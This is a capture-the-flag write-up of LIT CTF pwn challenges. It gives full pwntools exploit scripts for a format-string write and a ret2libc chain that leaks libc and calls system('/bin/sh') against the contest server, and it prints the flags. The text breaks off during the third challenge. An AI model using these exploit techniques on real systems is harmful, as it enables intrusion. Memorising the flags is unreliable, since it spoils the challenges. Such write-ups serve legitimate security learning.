Flippen_Printf#

Author:w0152
Description
I can’t seem to pull of a bit flip. Can you?

1
󰣇 lit_ctf/pwn/flippen_printf ❯ file uc
2
uc: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7049e959cebc100a110b399bc69e61f4370efc6c, for GNU/Linux 3.2.0, not stripped

1
pwnchecksec uc
2
    Arch:       amd64-64-little
3
    RELRO:      Full RELRO
4
    Stack:      No canary found
5
    NX:         NX enabled
6
    PIE:        PIE enabled
7
    SHSTK:      Enabled
8
    IBT:        Enabled
9
    Stripped:   No

We can see that this Elf is full relro but has no canary enabled.

Source Code#

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4

5
int win() {
6
  system("/bin/sh");
7
}
8

9
int main() {
10
  setbuf(stdout, 0);
11
  setbuf(stderr, 0);
12
  char buf[256];
13
  long x = 0;
14
  printf("Buffer located at: %p\n", buf);
15
  buf[read(0, buf, 256) - 1] = 0;
16
  printf(buf);
17
  if (x) win();
18
  exit(0);
19
}

From the Source code , there is a win function that is called only when the x is != 0. When looking at the code we can see that there is format string vulnerability here.

1
   buf[read(0, buf, 256) - 1] = 0;
2
  printf(buf);

Finding offset#

1
󰣇 lit_ctf/pwn/flippen_printf ❯ ./uc
2
Buffer located at: 0x7fffc1674160
3
AAAAAAAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
4
AAAAAAAAA0x7fffc16741600x2c(nil)(nil)(nil)0x10(nil)0x41414141414141410x25702570257025410x25702570257025700x25702570257025700x25702570257025700x7707007025700x218c0329000000020x100x400x1200000

We can see that the Letters are Repeated at 8th Offset , so we can confirm that where out printf input buffer starts.

Finding address of x#

   0x555555555229 <main+70>     mov    qword ptr [rbp - 0x118], 0     [0x7fffffffd528] <= 0
   0x555555555234 <main+81>     lea    rax, [rbp - 0x110]             RAX => 0x7fffffffd530 ◂— 1
 ► 0x55555555523b <main+88>     mov    rsi, rax                       RSI => 0x7fffffffd530 ◂— 1
   0x55555555523e <main+91>     lea    rax, [rip + 0xdc7]             RAX => 0x55555555600c ◂— 'Buffer located at: %p\n'
   0x555555555245 <main+98>     mov    rdi, rax                       RDI => 0x55555555600c ◂— 'Buffer located at: %p\n'
   0x555555555248 <main+101>    mov    eax, 0                         EAX => 0
   0x55555555524d <main+106>    call   printf@plt                  <printf@plt>

At main+70 , we can see that value 0 is moving to $rbp-0x118 , which is the variable x. Since the program is good enough to leak the buffer address , so we can calculate x stack address with it, where x = buf - 8.

Exploit#

1
from pwn import *
2
context.binary = elf = ELF('uc')
3

4
#p = process()
5
p = remote('litctf.org', 31785)
6

7
p.recvuntil(b'Buffer located at: ')
8
buf_addr = int(p.recvline(),16)
9

10
x_addr = buf_addr - 8
11
payload = fmtstr_payload(8, {x_addr: 1})
12

13
p.sendline(payload)
14
p.interactive()

1
 python ../flippen_printf/solve.py
2
[*] '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc'
3
    Arch:       amd64-64-little
4
    RELRO:      Partial RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        No PIE (0x400000)
8
    SHSTK:      Enabled
9
    IBT:        Enabled
10
    Stripped:   No
11
[+] Opening connection to litctf.org on port 31785: Done
12
[*] Switching to interactive mode
13
ca\x98\xcb\xde\x16\xfe\x7f$ l
14
$ s
15
$ cat flag.txt
16
/bin/sh: 1: l: not found
17
/bin/sh: 2: s: not found
18
LITCTF{why_d03s_%n_3x1s7_Lm4o}
19
$

Flag : LITCTF{why_d03s_%n_3x1s7_Lm4o}

l1t\x00n3wsAAAAAAApp\n#

Description
Can you find an unreleased news story on the LIT Newsapp? Note: This shares the same file as the LIT Newsapp rev challenge. The two challenges have different flags.

1
󰣇 lit_ctf/pwn/2ndlit ❯ file uc
2
uc: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6eeae81c4c16c71016051b5be540958892bd4f06, for GNU/Linux 3.2.0, not stripped

1
󰣇 lit_ctf/pwn/2ndlit ❯ pwnchecksec uc
2
    Arch:       amd64-64-little
3
    RELRO:      Partial RELRO
4
    Stack:      No canary found
5
    NX:         NX enabled
6
    PIE:        No PIE (0x400000)
7
    SHSTK:      Enabled
8
    IBT:        Enabled
9
    Stripped:   No

We can see that , The given Elf is dynamically linked and has no canary and pie with partial Relno , which makes things easy for it.

Code Review#

1
undefined8 main(void)
2

3
{
4
  int iVar1;
5
  ssize_t sVar2;
6
  undefined8 uVar3;
7
  undefined8 uStack_50;
8
  undefined local_48 [31];
9
  undefined auStack_29 [33];
10

11
  uStack_50 = 0x4011fe;
12
  puts("Enter username:");
13
  uStack_50 = 0x401214;
14
  sVar2 = read(0,auStack_29 + 1,0x60);
15
  auStack_29[sVar2] = 0;
16
  uStack_50 = 0x401229;
17
  puts("Enter password:");
18
  uStack_50 = 0x40123f;
19
  sVar2 = read(0,local_48,0x60);
20
  local_48[sVar2 + -1] = 0;
21
  uStack_50 = 0x40125b;
22
  iVar1 = check(auStack_29 + 1,local_48);
23
  if (iVar1 == 0) {
24
    uStack_50 = 0x4012ae;
25
    puts("Invalid credentials");
26
    uStack_50 = 0x4012b8;
27
    uVar3 = FUN_004010a0(0);
28
  }
29
  else {
30
    uStack_50 = 0x40126b;
31
    puts("Welcome");
32
    uStack_50 = 0x401277;
33
    puts("---------------------------------------------------------");
34
    uStack_50 = 0x401283;
35
    puts("Today\'s news: Lexington High School starts their 5th CTF!");
36
    uStack_50 = 0x40128f;
37
    puts("---------------------------------------------------------");
38
    uStack_50 = 0x40129b;
39
    puts("Goodbye");
40
    uVar3 = 0;
41
  }
42
  return uVar3;
43
}

This is the main function where the program , asks the user to prompt username and password.
If the username and password matches , the program has the heart to welcome and notify that this is the 5th LIT CTF and the program ends with a goodbye, which we don’t like after noticing a buffer overflow in both the username and password.

Find username and password#

1
undefined8 check(char *param_1,char *param_2)
2

3
{
4
  int iVar1;
5

6
  iVar1 = strcmp(param_1,"LITCTF");
7
  if ((iVar1 == 0) && (iVar1 = strcmp(param_2,"d0nt_57r1ngs_m3_3b775884"), iVar1 == 0)) {
8
    return 1;
9
  }
10
  return 0;
11
}

We can find the username and password is in check function , where our given username and password is being campared with strcmp function and returns 1 if it is correct username and password else it returns 0 for false.

Plan#

Since, we can see that there is a buffer overflow , I thought of doing Ret2Libc , but they are a bit stringy in it, as there is no libc provided. Then I thought this simple plan,

Overflow the stack.
Leak the libc with puts got.
Then again call the main to call the system from Libc.

But wait just spamming the buffer does not overflow the stack instead it prints invalid credentials.

1
󰣇 lit_ctf/pwn/2ndlit ❯ ./uc
2
Enter username:
3
LITCTF
4
Enter password:
5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
6
Invalid credentials

Why? Because of the check function, which checks our username and password , since here the password is not match with the one in program , it prints invalid credentials and exits the program.

1
void FUN_004010a0(int param_1)
2

3
{
4
                    /* WARNING: Subroutine does not return */
5
  exit(param_1);
6
}

First stage: overflow#

Since strcmp only compares the strings until it has null byte is reached. so, we use it to write to be precise overflow beyound buffer while bypassing the check function of username and password. while still causing the segfault.

1
p.recvuntil(b'Enter username:')
2
p.sendline(b'LITCTF')
3
p.recvuntil(b'Enter password:')
4
p.sendline(b'd0nt_57r1ngs_m3_3b775884\x00\nAAAAAALITCTF\x00\n'+cyclic(200))

This is my initial Python script to cause segmentation and by running this , I got a seg fault. Which is a Good thing.

1
 python sol.py
2
[*] '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc'
3
    Arch:       amd64-64-little
4
    RELRO:      Partial RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        No PIE (0x400000)
8
    SHSTK:      Enabled
9
    IBT:        Enabled
10
    Stripped:   No
11
[+] Starting local process '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc': pid 125836
12
[*] Switching to interactive mode
13

14
Welcome
15
---------------------------------------------------------
16
Today's news: Lexington High School starts their 5th CTF!
17
---------------------------------------------------------
18
Goodbye
19
[*] Got EOF while reading in interactive
20
$ ls
21
[*] Process '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc' stopped with exit code -11 (SIGSEGV) (pid 125836)
22
[*] Got EOF while sending in interactive

Stage 2: Libc Leak#

Since we got a way to control ret address , I moved to the next part of the plan , which is to leak libc adress. From ROPgadget , there is lucky enough to have have a pop rdi gadget in it , which makes our libc leak easy as we can send puts@got address to the puts to leak the libc address.

1
pop_rdi = 0x0000000000401323
2
ret = 0x000000000040101a
3

4
def leak_value():
5
    payload = flat (
6
    cyclic(32),
7
    pop_rdi,
8
    elf.got['puts'],
9
    elf.plt['puts'],
10
    elf.sym['main']
11
)
12
    return payload
13

14
payload = leak_value()
15

16
p.recvuntil(b'Enter username:')
17
p.sendline(b'LITCTF')
18
p.recvuntil(b'Enter password:')
19
p.sendline(b'd0nt_57r1ngs_m3_3b775884\x00\nAAAAAALITCTF\x00\n'+payload)
20
p.recvuntil(b'Goodbye\n')
21

22
leak = p.recvline().strip()
23
leaked_puts = u64(leak.ljust(8, b'\x00'))
24
print(hex(leaked_puts))

1
󰣇 lit_ctf/pwn/2ndlit ❯ python sol.py
2
[*] '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc'
3
    Arch:       amd64-64-little
4
    RELRO:      Partial RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        No PIE (0x400000)
8
    SHSTK:      Enabled
9
    IBT:        Enabled
10
    Stripped:   No
11
[+] Starting local process '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc': pid 27958
12
0x7275c68375c0
13
[*] Switching to interactive mode
14
[*] Got EOF while reading in interactive
15
$ whyyy
16
[*] Process '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc' stopped with exit code -11 (SIGSEGV) (pid 27958)
17
[*] Got EOF while sending in interactive

Yes, We successfully managed to leak the libc address of the puts, but wait why it didn’t read to main again. then after some time looking at the code , i found that read takes 96 bytes , but we are sending 104 bytes , which makes our last tail 8 bytes truncats and does not return to the main.

Then again after stumbling some time , I discovered that by making a 64 bytes overflow in the in the username buffer , the puts after leaking our sweet libc returns to that memory location.

1
def leak_value():
2
  payload = flat (
3
  pop_rdi,
4
  elf.got['puts'],
5
  elf.plt['puts']
6
)
7
  return payload
8

9
payload = leak_value()
10

11
main_addr = p64(elf.sym['main'])
12
main_addr_spam = cyclic(64) + main_addr + cyclic(24)
13
password =  main_addr_spam  +b'd0nt_57r1ngs_m3_3b775884\x00'
14
print(len(password))
15
p.recvuntil(b'Enter username:')
16
p.sendline( password + cyclic(128-(len(password))) +b'LITCTF\x00'+ cyclic(16) + main_addr + cyclic(9) + payload )

Program received signal SIGSEGV, Segmentation fault.
0x00007c45e45f1e9a in __GI__IO_puts (str=<optimized out>) at ioputs.c:46
46  in ioputs.c
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
──────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────
 RAX  7
 RBX  0
 RCX  0x7c45e47587b0 (_IO_stdfile_1_lock) ◂— 0
 RDX  0x7c45e47587b0 (_IO_stdfile_1_lock) ◂— 0
 RDI  0
 RSI  0x1d84e2a0 ◂— 0xa0a7c45e45f1da0
 R8   0
 R9   0
 R10  0
 R11  0x202
 R12  0x7ffe6018dc98 —▸ 0x7ffe6018fc4a ◂— '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc'
 R13  1
 R14  0x7c45e47cc000 (_rtld_global) —▸ 0x7c45e47cd310 ◂— 0
 R15  0
 RBP  0x6961616168616161 ('aaahaaai')
 RSP  0x7ffe6018db90 ◂— 'qaaaraaasaaataaauaaavaaawaaaxaa'
 RIP  0x7c45e45f1e9a (puts+250) ◂— ret
───────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────
   0x7c45e45f1e92 <puts+242>    pop    rbx
   0x7c45e45f1e93 <puts+243>    pop    r12
   0x7c45e45f1e95 <puts+245>    pop    r13
   0x7c45e45f1e97 <puts+247>    pop    r14
   0x7c45e45f1e99 <puts+249>    pop    rbp
 ► 0x7c45e45f1e9a <puts+250>    ret                                <0x6161617261616171>
    ↓




────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffe6018db90 ◂— 'qaaaraaasaaataaauaaavaaawaaaxaa'
01:0008│     0x7ffe6018db98 ◂— 'saaataaauaaavaaawaaaxaa'
02:0010│     0x7ffe6018dba0 ◂— 'uaaavaaawaaaxaa'
03:0018│     0x7ffe6018dba8 ◂— 0x61617861616177 /* 'waaaxaa' */
04:0020│     0x7ffe6018dbb0 —▸ 0x7ffe6018dc98 —▸ 0x7ffe6018fc4a ◂— '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc'
05:0028│     0x7ffe6018dbb8 ◂— 1
06:0030│     0x7ffe6018dbc0 —▸ 0x7c45e47cc000 (_rtld_global) —▸ 0x7c45e47cd310 ◂— 0
07:0038│     0x7ffe6018dbc8 ◂— 0
──────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────
 ► 0   0x7c45e45f1e9a puts+250
   1 0x6161617261616171 None
   2 0x6161617461616173 None
   3 0x6161617661616175 None
   4 0x61617861616177 None
   5   0x7ffe6018dc98 None
   6              0x1 None
   7   0x7c45e47cc000 _rtld_global

Then after placing the main address at offset 64, we can see that after puts the program again enter into the main function.

finding libc version#

Since we managed to leak libc locally, lets leak it in remote and find the libc version to get same libc as in remote.

1
󰣇 lit_ctf/pwn/2ndlit ❯ python sol.py REMOTE                           3.13.3  19:11
2
[*] '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc'
3
    Arch:       amd64-64-little
4
    RELRO:      Partial RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        No PIE (0x400000)
8
    SHSTK:      Enabled
9
    IBT:        Enabled
10
    Stripped:   No
11
[+] Opening connection to litctf.org on port 31779: Done
12
0x7631eb33ebe0
13
[*] Switching to interactive mode
14
Enter username:
15
Enter password:
16
$

Like by leaking the value from read got table (read@got), we can leak the libc address of read. So with the help of libc.rip , we can find the correct libc version. After giving out libc address the numb of offset trim down to two, where one libc is the next version one libc. so both both libc may work here.

libc_find

After finding the correct libc version , we need into patch the binary to use that spectific libc version.

1
󰣇 lit_ctf/pwn/2ndlit ❯ pwninit
2
bin: ./uc
3
libc: ./libc6_2.39-0ubuntu8.4_amd64.so
4

5
fetching linker
6
https://launchpad.net/ubuntu/+archive/primary/+files//libc6_2.39-0ubuntu8.4_amd64.deb
7
setting ./ld-2.39.so executable
8
symlinking ./libc.so.6 -> libc6_2.39-0ubuntu8.4_amd64.so
9
copying ./uc to ./uc_patched
10
running patchelf on ./uc_patched

Last stage#

since we got our hands on a correct libc file and can leak the libc address at run time and come back again to main function , now we can get start to make a call to system by seting rdi to /bin/sh address.

1
pop_rdi = 0x0000000000401323
2
ret = 0x000000000040101a
3

4
def leak_value():
5
  payload = flat (
6
  pop_rdi,
7
  elf.got['puts'],
8
  elf.plt['puts']
9
)
10
  return payload
11

12
payload = leak_value()
13

14

15
main_addr = p64(elf.sym['main'])
16
main_addr_spam = cyclic(64) + main_addr + cyclic(24)
17
password =  main_addr_spam  +b'd0nt_57r1ngs_m3_3b775884\x00'
18

19

20
p.recvuntil(b'Enter username:')
21
p.sendline( password + cyclic(128-(len(password))) +b'LITCTF\x00'+ cyclic(33)+ payload )
22
p.recvuntil(b'Goodbye\n')
23

24
leak = p.recvline().strip()
25
leaked_puts = u64(leak.ljust(8, b'\x00'))
26
print(hex(leaked_puts))
27

28
print('puts lib addr',hex(libc.sym.puts))
29

30
libc.address = leaked_puts - libc.sym.puts
31
print(hex(libc.address))
32

33
system_addr = libc.sym.system
34
binsh = next(libc.search(b'/bin/sh'))
35

36
def shellcode():
37
    payload = flat (
38
    pop_rdi,
39
    binsh,
40
    system_addr
41
    )
42
    return payload
43

44
shellcode = shellcode()
45
p.recvuntil(b'Enter password:')
46
p.sendline(b'd0nt_57r1ngs_m3_3b775884\x00\nAAAAAALITCTF\x00\n'+cyclic(32)+shellcode)
47
print(len(b'd0nt_57r1ngs_m3_3b775884\x00\nAAAAAALITCTF\x00\n'+cyclic(32)+shellcode))

Program received signal SIGSEGV, Segmentation fault.
Download failed: Invalid argument.  Continuing without source file ./stdlib/../sysdeps/posix/system.c.
0x00007ee8ba45843b in do_system (line=0x7ee8ba5cb42f "/bin/sh") at ../sysdeps/posix/system.c:148
warning: 148  ../sysdeps/posix/system.c: No such file or directory
Download failed: Invalid argument.  Continuing without source file ./stdlib/../sysdeps/posix/system.c.
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────
*RAX  0x7ee8ba60ad58 (environ) —▸ 0x7fff23b28838 —▸ 0x7fff23b29c6e ◂— 'HYDE_DATA_HOME=/home/hyder/.local/share/hyde'
*RBX  0x7fff23b285b8 ◂— 0xc /* '\x0c' */
*RCX  0x7fff23b285b8 ◂— 0xc /* '\x0c' */
 RDX  0
*RDI  0x7fff23b283a4 ◂— 0xba526b5400007ee8
*RSI  0x7ee8ba5cb42f ◂— 0x68732f6e69622f /* '/bin/sh' */
*R8   0x7fff23b283e8 ◂— 0
*R9   0x7fff23b28838 —▸ 0x7fff23b29c6e ◂— 'HYDE_DATA_HOME=/home/hyder/.local/share/hyde'
*R10  8
*R11  0x246
*R12  0x7ee8ba5cb42f ◂— 0x68732f6e69622f /* '/bin/sh' */
 R13  0
 R14  0
 R15  0x7ee8ba7ab000 (_rtld_global) —▸ 0x7ee8ba7ac2e0 ◂— 0
*RBP  0x7fff23b28418 ◂— 0
*RSP  0x7fff23b28398 —▸ 0x7ee8ba76bd20 —▸ 0x7ee8ba773c01 ◂— 'GLIBC_2.35'
*RIP  0x7ee8ba45843b (do_system+363) ◂— movaps xmmword ptr [rsp + 0x50], xmm0
────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────
 ► 0x7ee8ba45843b <do_system+363>    movaps xmmword ptr [rsp + 0x50], xmm0     <[0x7fff23b283e8] not aligned to 16 bytes>
   0x7ee8ba458440 <do_system+368>    call   posix_spawn@@GLIBC_2.15     <posix_spawn@@GLIBC_2.15>

   0x7ee8ba458445 <do_system+373>    mov    rdi, rbx
   0x7ee8ba458448 <do_system+376>    mov    r12d, eax
   0x7ee8ba45844b <do_system+379>    call   posix_spawnattr_destroy     <posix_spawnattr_destroy>

   0x7ee8ba458450 <do_system+384>    test   r12d, r12d
   0x7ee8ba458453 <do_system+387>    je     do_system+632               <do_system+632>

   0x7ee8ba458459 <do_system+393>    mov    dword ptr [rsp + 8], 0x7f00
   0x7ee8ba458461 <do_system+401>    xor    eax, eax                                  EAX => 0
   0x7ee8ba458463 <do_system+403>    mov    edx, 1                                    EDX => 1
   0x7ee8ba458468 <do_system+408>    lock cmpxchg dword ptr [rip + 0x1ad070], edx
──────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────
00:0000│ rsp   0x7fff23b28398 —▸ 0x7ee8ba76bd20 —▸ 0x7ee8ba773c01 ◂— 'GLIBC_2.35'
01:0008│ rdi-4 0x7fff23b283a0 ◂— 0x7ee8ffffffff
02:0010│-070   0x7fff23b283a8 —▸ 0x7ee8ba526b54 (sbrk+164) ◂— test eax, eax
03:0018│-068   0x7fff23b283b0 —▸ 0x7fff23b283e0 —▸ 0x2111d2a0 ◂— 'Goodbye\n-------------------------------------------------\n'
04:0020│-060   0x7fff23b283b8 ◂— 0x290
05:0028│-058   0x7fff23b283c0 —▸ 0x7ee8ba603ac0 (main_arena) ◂— 0
06:0030│-050   0x7fff23b283c8 ◂— 0x280
07:0038│-048   0x7fff23b283d0 —▸ 0x7fff23b283e0 —▸ 0x2111d2a0 ◂— 'Goodbye\n-------------------------------------------------\n'
────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────
 ► 0   0x7ee8ba45843b do_system+363
   1              0x1 None
   2              0x0 None
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

But running this , we could not get the shell. since the stack is not alliged. so, after some thinking and some advise, I tried to calling main one time before calling before sending the payload to call the system.

1
󰣇 lit_ctf/pwn/2ndlit ❯ python sol.py                                                                                                                             3.13.3  20:20
2
[*] '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc_patched'
3
    Arch:       amd64-64-little
4
    RELRO:      Partial RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        No PIE (0x3fe000)
8
    RUNPATH:    b'.'
9
    SHSTK:      Enabled
10
    IBT:        Enabled
11
    Stripped:   No
12
[*] '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/libc6_2.39-0ubuntu8.4_amd64.so'
13
    Arch:       amd64-64-little
14
    RELRO:      Full RELRO
15
    Stack:      Canary found
16
    NX:         NX enabled
17
    PIE:        PIE enabled
18
    FORTIFY:    Enabled
19
    SHSTK:      Enabled
20
    IBT:        Enabled
21
    Stripped:   No
22
    Debuginfo:  Yes
23
[+] Starting local process '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc_patched': pid 151910
24
0x7a588a287be0
25
puts lib addr 0x87be0
26
0x7a588a200000
27
121
28
[*] Switching to interactive mode
29

30
Enter password:
31
Welcome
32
---------------------------------------------------------
33
Today's news: Lexington High School starts their 5th CTF!
34
---------------------------------------------------------
35
Goodbye
36
$ id
37
uid=1000(hyder) gid=984(users) groups=984(users),150(wireshark),986(uucp),996(audio),998(wheel),1001(usb)
38
$

yea , got the shell 😃.

Exploit#

1
#!/usr/bin/env python3
2

3
from pwn import *
4

5
elf = ELF("./uc_patched")
6
libc = ELF('libc6_2.39-0ubuntu8.4_amd64.so')
7
context.binary = elf
8
context.terminal = ['kitty','-e']
9

10
gdbscript = '''
11
b*main
12
b*0x00000000004012b9
13
c
14
'''
15

16
if args.REMOTE:
17
    p = remote('litctf.org',31779)
18
elif args.GDB:
19
    p = gdb.debug(elf.path, gdbscript=gdbscript)
20
else:
21
    p = process(elf.path)
22

23
pop_rdi = 0x0000000000401323
24
ret = 0x000000000040101a
25

26
def leak_value():
27
  payload = flat (
28
  pop_rdi,
29
  elf.got['puts'],
30
  elf.plt['puts']
31
)
32
  return payload
33

34
payload = leak_value()
35

36

37
main_addr = p64(elf.sym['main'])
38
main_addr_spam = cyclic(64) + main_addr + cyclic(24)
39
password =  main_addr_spam  +b'd0nt_57r1ngs_m3_3b775884\x00'
40

41

42
p.recvuntil(b'Enter username:')
43
p.sendline( password + cyclic(128-(len(password))) +b'LITCTF\x00'+ cyclic(33)+ payload )
44
p.recvuntil(b'Goodbye\n')
45

46
leak = p.recvline().strip()
47
leaked_puts = u64(leak.ljust(8, b'\x00'))
48
print(hex(leaked_puts))
49

50
print('puts lib addr',hex(libc.sym.puts))
51

52
libc.address = leaked_puts - libc.sym.puts
53
print(hex(libc.address))
54

55
system_addr = libc.sym.system
56
binsh = next(libc.search(b'/bin/sh'))
57

58
def shellcode():
59
    payload = flat (
60
    pop_rdi,
61
    binsh,
62
    system_addr
63
    )
64
    return payload
65

66

67

68
shellcode = shellcode()
69
p.recvuntil(b'Enter password:')
70
p.sendline(b'd0nt_57r1ngs_m3_3b775884\x00\nAAAAAALITCTF\x00\n'+cyclic(32)+main_addr)
71

72
main_addr_spam = cyclic(64) + main_addr + cyclic(24)
73
password =  main_addr_spam  +b'd0nt_57r1ngs_m3_3b775884\x00'
74
print(len(password))
75
p.recvuntil(b'Enter username:')
76
p.sendline( password + cyclic(128-(len(password))) +b'LITCTF\x00'+ cyclic(16) + main_addr + cyclic(9) + shellcode )
77

78
p.interactive()

In remote,

1
󰣇 lit_ctf/pwn/2ndlit ❯ python sol.py REMOTE                                                                                                                      3.13.3  20:22
2
[*] '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/uc_patched'
3
    Arch:       amd64-64-little
4
    RELRO:      Partial RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        No PIE (0x3fe000)
8
    RUNPATH:    b'.'
9
    SHSTK:      Enabled
10
    IBT:        Enabled
11
    Stripped:   No
12
[*] '/home/hyder/CTF_FILES/lit_ctf/pwn/2ndlit/libc6_2.39-0ubuntu8.4_amd64.so'
13
    Arch:       amd64-64-little
14
    RELRO:      Full RELRO
15
    Stack:      Canary found
16
    NX:         NX enabled
17
    PIE:        PIE enabled
18
    FORTIFY:    Enabled
19
    SHSTK:      Enabled
20
    IBT:        Enabled
21
    Stripped:   No
22
    Debuginfo:  Yes
23
[+] Opening connection to litctf.org on port 31779: Done
24
0x7f126e9b9be0
25
puts lib addr 0x87be0
26
0x7f126e932000
27
121
28
[*] Switching to interactive mode
29

30
Enter password:
31
Welcome
32
---------------------------------------------------------
33
Today's news: Lexington High School starts their 5th CTF!
34
---------------------------------------------------------
35
Goodbye
36
$ ls
37
$ cat flag.txt
38
flag.txt
39
main
40
run.sh
41
LITCTF{s3cret_LIT_n3w5:_4ll_r3v_1s_pwn???}
42
$

Flag: LITCTF{s3cret_LIT_n3w5:_4ll_r3v_1s_pwn???}

distilled printf#

Description
I use fahrenheit Note: This is a challenge that I is solved after CTF ended.

1
󰣇 lit_ctf/pwn/distilled_printf_maon ❯ file main_patched
2
main_patched: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ld-2.24.so, BuildID[sha1]=c882c084a865854a8d4381a79e148f76939fe895, for GNU/Linux 3.2.0, not stripped

1
󰣇 lit_ctf/pwn/distilled_printf_maon ❯ pwnchecksec main_patched
2
[*] '/home/hyder/CTF_FILES/lit_ctf/pwn/distilled_printf_maon/main_patched'
3
    Arch:       amd64-64-little
4
    RELRO:      Full RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        PIE enabled
8
    RUNPATH:    b'.'
9
    Stripped:   No

code review#

1
void main(void)
2

3
{
4
  long in_FS_OFFSET;
5
  int local_21c;
6
  char local_218 [520];
7
  undefined8 local_10;
8

9
  local_10 = *(undefined8 *)(in_FS_OFFSET + 0x28);
10
  for (local_21c = 32; local_21c < 212; local_21c = local_21c + 1) {
11
    fgets(local_218,512,stdin);
12
    printf(local_218);
13
  }
14
                    /* WARNING: Subroutine does not return */
15
  _exit(0);
16
}

When i looked at the challenge name , I can preety much assume that this is also one of the challenge that has format_string , as we see that vulnerable printf function in the code.
Then this program loops 180 times and get the input from stdin and prints , so each run we get format string bug.

leak for libc#

pwndbg> r
Starting program: /home/hyder/CTF_FILES/lit_ctf/pwn/distilled_printf_maon/main_patched
%p %p
0x7ffff7bc3770 0x7fffffffd430

pwndbg> vmmap 0x7ffff7bc3770
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
             Start                End Perm     Size Offset File (set vmmap-prefer-relpaths on)
    0x7ffff7bc1000     0x7ffff7bc3000 rw-p     2000 1c1000 libc-2.24.so
►   0x7ffff7bc3000     0x7ffff7bc7000 rw-p     4000      0 [anon_7ffff7bc3] +0x770
    0x7ffff7c00000     0x7ffff7c25000 r-xp    25000      0 ld-2.24.so


pwndbg> p/x 0x7ffff7bc3770-0x7ffff7800000
$2 = 0x3c3770
pwndbg> vmmap 0x7ffff7bc3770-0x3c3770
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
             Start                End Perm     Size Offset File (set vmmap-prefer-relpaths on)
    0x55555555b000     0x55555557c000 rw-p    21000      0 [heap]
►   0x7ffff7800000     0x7ffff79bd000 r-xp   1bd000      0 libc-2.24.so +0x0
    0x7ffff79bd000     0x7ffff7bbd000 ---p   200000 1bd000 libc-2.24.so
pwndbg>

From the first leak , we get some anonymous memory address which is 0x0x3c3770 away from libc base. so, libc_base = leak - 0x0x3c3770 From the second leak we get some stack address leak, which we may use it later.

Eventhough, we get the base address the program does not return but instead it exits directly, eventhough there is bufferoverflow due to exit it , it wont work here. Then again after search through the memory with gdb and with the help of GPT , I found that when printf is called it returns to the main function again , If there we can overwrite the return address with our arbitary memory , we can control that return address and control the program execution.

Breakpoint 2, 0x00007ffff78565b0 in __printf (format=<optimized out>) at printf.c:37
37  in printf.c
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
──────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────
*RAX  3
 RBX  0
*RCX  0x7ffff78f7cf0 (__write_nocancel+7) ◂— cmp rax, -0xfff
*RDX  0x7ffff7bc3760 (_IO_stdfile_1_lock) ◂— 0
*RDI  0x55555555b420 ◂— 0xa6473 /* 'sd\n' */
*RSI  0x55555555b420 ◂— 0xa6473 /* 'sd\n' */
*R8   0x7ffff7ff4700 ◂— 0x7ffff7ff4700
*R9   3
*R10  0x55555555b420 ◂— 0xa6473 /* 'sd\n' */
 R11  0x246
 R12  0x5555555550a0 (_start) ◂— endbr64
 R13  0x7fffffffd720 ◂— 1
 R14  0
 R15  0
 RBP  0x7fffffffd640 —▸ 0x555555555200 (__libc_csu_init) ◂— endbr64
